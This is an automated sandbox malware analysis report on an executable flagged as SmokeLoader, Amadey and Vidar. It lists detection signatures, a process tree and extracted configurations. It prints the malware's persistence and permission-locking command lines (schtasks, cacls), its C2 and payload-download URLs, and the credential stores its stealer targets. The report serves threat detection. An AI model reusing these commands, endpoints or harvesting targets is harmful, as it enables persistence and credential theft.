Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
kmxId0uLRn.exe

Overview

General Information

Sample Name:kmxId0uLRn.exe
Analysis ID:766457
MD5:c8782da2928f63712d03d0ea36c57c3f
SHA1:0d87ba5d17440501fe3629f56feb0a9193d43b43
SHA256:a68b2d14b767df5edb784bc338c84e09d73ac90a75346a9fedce2b0163ca9656
Tags:DofoilexeSmokeLoader
Infos:

Detection

Amadey, SmokeLoader, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Amadeys stealer DLL
Yara detected SmokeLoader
Yara detected Amadey bot
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Yara detected Vidar stealer
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Machine Learning detection for sample
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses schtasks.exe or at.exe to add and modify task schedules
Checks if the current machine is a virtual machine (disk enumeration)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Injects code into the Windows Explorer (explorer.exe)
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Tries to steal Instant Messenger accounts or passwords
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Uses cacls to modify the permissions of files
Contains functionality to launch a program with higher privileges

Classification

  • System is w10x64
  • kmxId0uLRn.exe (PID: 5936 cmdline: C:\Users\user\Desktop\kmxId0uLRn.exe MD5: C8782DA2928F63712D03D0EA36C57C3F)
    • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • 8F68.exe (PID: 1568 cmdline: C:\Users\user\AppData\Local\Temp\8F68.exe MD5: 46F30465FA693033E7D3D78468406C0C)
        • conhost.exe (PID: 1324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • WerFault.exe (PID: 2292 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 268 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • 9545.exe (PID: 6140 cmdline: C:\Users\user\AppData\Local\Temp\9545.exe MD5: C6524CC2CB091E23BE6D9526D6BCBC99)
        • gntuud.exe (PID: 5972 cmdline: "C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe" MD5: C6524CC2CB091E23BE6D9526D6BCBC99)
          • schtasks.exe (PID: 1012 cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe" /F MD5: 15FF7D8324231381BAD48A052F85DF04)
            • conhost.exe (PID: 4944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 504 cmdline: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "user:N"&&CACLS "gntuud.exe" /P "user:R" /E&&echo Y|CACLS "..\2c33368f7d" /P "user:N"&&CACLS "..\2c33368f7d" /P "user:R" /E&&Exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 2300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • cmd.exe (PID: 4644 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • cacls.exe (PID: 3516 cmdline: CACLS "gntuud.exe" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
            • cacls.exe (PID: 5652 cmdline: CACLS "gntuud.exe" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
            • cmd.exe (PID: 5680 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • cacls.exe (PID: 5720 cmdline: CACLS "..\2c33368f7d" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
            • cacls.exe (PID: 5868 cmdline: CACLS "..\2c33368f7d" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
          • rundll32.exe (PID: 4876 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dll, Main MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • explorer.exe (PID: 2096 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • explorer.exe (PID: 3940 cmdline: C:\Windows\explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • explorer.exe (PID: 1020 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • explorer.exe (PID: 4044 cmdline: C:\Windows\explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • explorer.exe (PID: 4696 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • explorer.exe (PID: 5536 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • explorer.exe (PID: 5692 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • explorer.exe (PID: 5896 cmdline: C:\Windows\explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • explorer.exe (PID: 1004 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
  • thgcici (PID: 2108 cmdline: C:\Users\user\AppData\Roaming\thgcici MD5: C8782DA2928F63712D03D0EA36C57C3F)
  • gntuud.exe (PID: 3124 cmdline: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe MD5: C6524CC2CB091E23BE6D9526D6BCBC99)
  • thgcici (PID: 4892 cmdline: C:\Users\user\AppData\Roaming\thgcici MD5: C8782DA2928F63712D03D0EA36C57C3F)
  • gntuud.exe (PID: 3920 cmdline: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe MD5: C6524CC2CB091E23BE6D9526D6BCBC99)
  • cleanup
{"C2 url": "62.204.41.79/fb73jc3/index.php", "Version": "3.60"}
{"C2 list": ["http://s2scomm20.com/", "http://c2csosi228d.com/", "http://xdd42sdfsdf.com/"]}
{"C2 url": ["https://t.me/ttruelive", "https://steamcommunity.com/profiles/76561199443972360"], "Botnet": "1808", "Version": "56.2"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AmadeyYara detected Amadey botJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dllJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dllINDICATOR_TOOL_PWS_AmadyDetects password stealer DLL. Dropped by AmadeyditekSHen
      • 0xd868:$s1: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
      • 0x15604:$s1: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
      • 0x16074:$s1: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
      • 0x15158:$s2: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
      • 0x151bc:$s2: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
      • 0xdd0c:$s3: \Mikrotik\Winbox\Addresses.cdb
      • 0x190d8:$s4: \HostName
      • 0x19100:$s5: \Password
      • 0x17c04:$s6: SOFTWARE\RealVNC\
      • 0x17c30:$s6: SOFTWARE\RealVNC\
      • 0x17c5c:$s6: SOFTWARE\RealVNC\
      • 0x17ca4:$s6: SOFTWARE\RealVNC\
      • 0x17cd0:$s6: SOFTWARE\RealVNC\
      • 0x18008:$s7: SOFTWARE\TightVNC\
      • 0x18034:$s7: SOFTWARE\TightVNC\
      • 0x18060:$s7: SOFTWARE\TightVNC\
      • 0x180ac:$s7: SOFTWARE\TightVNC\
      • 0x1c43c:$s8: cred.dll
      C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
        C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dllJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
          C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dllINDICATOR_TOOL_PWS_AmadyDetects password stealer DLL. Dropped by AmadeyditekSHen
          • 0xd868:$s1: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
          • 0x15604:$s1: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
          • 0x16074:$s1: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
          • 0x15158:$s2: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
          • 0x151bc:$s2: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
          • 0xdd0c:$s3: \Mikrotik\Winbox\Addresses.cdb
          • 0x190d8:$s4: \HostName
          • 0x19100:$s5: \Password
          • 0x17c04:$s6: SOFTWARE\RealVNC\
          • 0x17c30:$s6: SOFTWARE\RealVNC\
          • 0x17c5c:$s6: SOFTWARE\RealVNC\
          • 0x17ca4:$s6: SOFTWARE\RealVNC\
          • 0x17cd0:$s6: SOFTWARE\RealVNC\
          • 0x18008:$s7: SOFTWARE\TightVNC\
          • 0x18034:$s7: SOFTWARE\TightVNC\
          • 0x18060:$s7: SOFTWARE\TightVNC\
          • 0x180ac:$s7: SOFTWARE\TightVNC\
          • 0x1c43c:$s8: cred.dll
          Click to see the 1 entries
          SourceRuleDescriptionAuthorStrings
          0000001D.00000000.425029230.0000000000F01000.00000020.00000001.01000000.0000000D.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
            0000001D.00000002.428729367.0000000000F01000.00000020.00000001.01000000.0000000D.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              0000000E.00000000.403627141.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                00000015.00000003.498981390.0000000000C04000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_AmadeyYara detected Amadey botJoe Security
                  0000002B.00000003.588957160.0000000000490000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                    Click to see the 51 entries
                    SourceRuleDescriptionAuthorStrings
                    43.3.thgcici.490000.0.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                      14.0.9545.exe.dd0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                        11.2.thgcici.6a0e67.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                          44.2.gntuud.exe.f00000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                            14.0.9545.exe.dd0000.3.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                              Click to see the 20 entries
                              No Sigma rule has matched
                              Timestamp:192.168.2.362.204.41.7949801802027700 12/13/22-20:09:37.904526
                              SID:2027700
                              Source Port:49801
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949764802027700 12/13/22-20:09:24.415498
                              SID:2027700
                              Source Port:49764
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949749802027700 12/13/22-20:09:18.397632
                              SID:2027700
                              Source Port:49749
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949767802027700 12/13/22-20:09:25.222687
                              SID:2027700
                              Source Port:49767
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949795802027700 12/13/22-20:09:35.735518
                              SID:2027700
                              Source Port:49795
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949770802027700 12/13/22-20:09:26.190276
                              SID:2027700
                              Source Port:49770
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.3185.246.221.15149699802851815 12/13/22-20:08:50.072694
                              SID:2851815
                              Source Port:49699
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949740802027700 12/13/22-20:09:15.487438
                              SID:2027700
                              Source Port:49740
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949798802027700 12/13/22-20:09:36.748511
                              SID:2027700
                              Source Port:49798
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949746802027700 12/13/22-20:09:17.426965
                              SID:2027700
                              Source Port:49746
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949743802027700 12/13/22-20:09:16.449856
                              SID:2027700
                              Source Port:49743
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949761802027700 12/13/22-20:09:23.806620
                              SID:2027700
                              Source Port:49761
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949752802027700 12/13/22-20:09:21.874851
                              SID:2027700
                              Source Port:49752
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949771802027700 12/13/22-20:09:26.565033
                              SID:2027700
                              Source Port:49771
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949802802027700 12/13/22-20:09:39.191576
                              SID:2027700
                              Source Port:49802
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949748802027700 12/13/22-20:09:18.100262
                              SID:2027700
                              Source Port:49748
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949777802027700 12/13/22-20:09:30.589327
                              SID:2027700
                              Source Port:49777
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949742802027700 12/13/22-20:09:16.147180
                              SID:2027700
                              Source Port:49742
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949794802027700 12/13/22-20:09:35.428306
                              SID:2027700
                              Source Port:49794
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949789802027700 12/13/22-20:09:34.068418
                              SID:2027700
                              Source Port:49789
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949754802027700 12/13/22-20:09:22.487126
                              SID:2027700
                              Source Port:49754
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949782802027700 12/13/22-20:09:32.020133
                              SID:2027700
                              Source Port:49782
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949747802027700 12/13/22-20:09:17.691856
                              SID:2027700
                              Source Port:49747
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949760802027700 12/13/22-20:09:23.551005
                              SID:2027700
                              Source Port:49760
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949776802027700 12/13/22-20:09:30.348436
                              SID:2027700
                              Source Port:49776
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949753802027700 12/13/22-20:09:22.159892
                              SID:2027700
                              Source Port:49753
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949759802027700 12/13/22-20:09:23.268020
                              SID:2027700
                              Source Port:49759
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949783802027700 12/13/22-20:09:32.395745
                              SID:2027700
                              Source Port:49783
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949807802027700 12/13/22-20:09:40.738951
                              SID:2027700
                              Source Port:49807
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949788802027700 12/13/22-20:09:33.792525
                              SID:2027700
                              Source Port:49788
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949765802027700 12/13/22-20:09:24.668106
                              SID:2027700
                              Source Port:49765
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949787802027700 12/13/22-20:09:33.525784
                              SID:2027700
                              Source Port:49787
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949790802027700 12/13/22-20:09:34.337562
                              SID:2027700
                              Source Port:49790
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949796802027700 12/13/22-20:09:36.034730
                              SID:2027700
                              Source Port:49796
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949781802027700 12/13/22-20:09:31.753391
                              SID:2027700
                              Source Port:49781
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949772802027700 12/13/22-20:09:29.469495
                              SID:2027700
                              Source Port:49772
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949735802027700 12/13/22-20:09:14.280167
                              SID:2027700
                              Source Port:49735
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949741802027700 12/13/22-20:09:15.797540
                              SID:2027700
                              Source Port:49741
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949799802027700 12/13/22-20:09:37.255404
                              SID:2027700
                              Source Port:49799
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949766802027700 12/13/22-20:09:24.922545
                              SID:2027700
                              Source Port:49766
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949803802027700 12/13/22-20:09:39.585529
                              SID:2027700
                              Source Port:49803
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949806802027700 12/13/22-20:09:40.381114
                              SID:2027700
                              Source Port:49806
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949757802027700 12/13/22-20:09:23.006710
                              SID:2027700
                              Source Port:49757
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949778802027700 12/13/22-20:09:30.907345
                              SID:2027700
                              Source Port:49778
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949775802027700 12/13/22-20:09:30.081643
                              SID:2027700
                              Source Port:49775
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949793802027700 12/13/22-20:09:35.174611
                              SID:2027700
                              Source Port:49793
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949800802027700 12/13/22-20:09:37.581033
                              SID:2027700
                              Source Port:49800
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949784802027700 12/13/22-20:09:32.706051
                              SID:2027700
                              Source Port:49784
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949769802027700 12/13/22-20:09:25.868942
                              SID:2027700
                              Source Port:49769
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949774802027700 12/13/22-20:09:29.736811
                              SID:2027700
                              Source Port:49774
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949805802027700 12/13/22-20:09:40.125674
                              SID:2027700
                              Source Port:49805
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949768802027700 12/13/22-20:09:25.563234
                              SID:2027700
                              Source Port:49768
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949751802027700 12/13/22-20:09:20.733567
                              SID:2027700
                              Source Port:49751
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949786802027700 12/13/22-20:09:33.253065
                              SID:2027700
                              Source Port:49786
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949791802027700 12/13/22-20:09:34.581849
                              SID:2027700
                              Source Port:49791
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949739802027700 12/13/22-20:09:15.157831
                              SID:2027700
                              Source Port:49739
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949745802027700 12/13/22-20:09:17.106517
                              SID:2027700
                              Source Port:49745
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949750802027700 12/13/22-20:09:19.302564
                              SID:2027700
                              Source Port:49750
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949792802027700 12/13/22-20:09:34.882839
                              SID:2027700
                              Source Port:49792
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949779802027700 12/13/22-20:09:31.163445
                              SID:2027700
                              Source Port:49779
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949785802027700 12/13/22-20:09:32.996655
                              SID:2027700
                              Source Port:49785
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949744802027700 12/13/22-20:09:16.793275
                              SID:2027700
                              Source Port:49744
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949780802027700 12/13/22-20:09:31.434688
                              SID:2027700
                              Source Port:49780
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949738802027700 12/13/22-20:09:14.724261
                              SID:2027700
                              Source Port:49738
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949762802027700 12/13/22-20:09:24.088211
                              SID:2027700
                              Source Port:49762
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949804802027700 12/13/22-20:09:39.864342
                              SID:2027700
                              Source Port:49804
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949756802027700 12/13/22-20:09:22.763314
                              SID:2027700
                              Source Port:49756
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.362.204.41.7949797802027700 12/13/22-20:09:36.311423
                              SID:2027700
                              Source Port:49797
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Source: http://62.204.41.79/fb73jc3/Plugins/cred64.dllAvira URL Cloud: Label: malware
                              Source: http://s2scomm20.com/Avira URL Cloud: Label: malware
                              Source: http://c2csosi228d.com/Avira URL Cloud: Label: malware
                              Source: http://31.41.244.228/fusa/bibar.exeAvira URL Cloud: Label: malware
                              Source: http://xdd42sdfsdf.com/Avira URL Cloud: Label: malware
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dllAvira: detection malicious, Label: HEUR/AGEN.1233121
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeAvira: detection malicious, Label: HEUR/AGEN.1253146
                              Source: C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dllAvira: detection malicious, Label: HEUR/AGEN.1233121
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeAvira: detection malicious, Label: HEUR/AGEN.1253146
                              Source: kmxId0uLRn.exeReversingLabs: Detection: 69%
                              Source: kmxId0uLRn.exeVirustotal: Detection: 60%Perma Link
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dllReversingLabs: Detection: 79%
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeReversingLabs: Detection: 52%
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeReversingLabs: Detection: 52%
                              Source: C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dllReversingLabs: Detection: 79%
                              Source: C:\Users\user\AppData\Roaming\thgciciReversingLabs: Detection: 69%
                              Source: kmxId0uLRn.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Roaming\thgciciJoe Sandbox ML: detected
                              Source: 12.0.8F68.exe.c42a60.7.unpackAvira: Label: TR/Patched.Ren.Gen
                              Source: 12.0.8F68.exe.c42a60.5.unpackAvira: Label: TR/Patched.Ren.Gen
                              Source: 0000002B.00000002.605352083.0000000002101000.00000004.10000000.00040000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"C2 list": ["http://s2scomm20.com/", "http://c2csosi228d.com/", "http://xdd42sdfsdf.com/"]}
                              Source: 0000000C.00000000.404562471.0000000000C42000.00000004.00000001.01000000.00000009.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://t.me/ttruelive", "https://steamcommunity.com/profiles/76561199443972360"], "Botnet": "1808", "Version": "56.2"}
                              Source: 14.0.9545.exe.dd0000.3.unpackMalware Configuration Extractor: Amadey {"C2 url": "62.204.41.79/fb73jc3/index.php", "Version": "3.60"}
                              Source: kmxId0uLRn.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
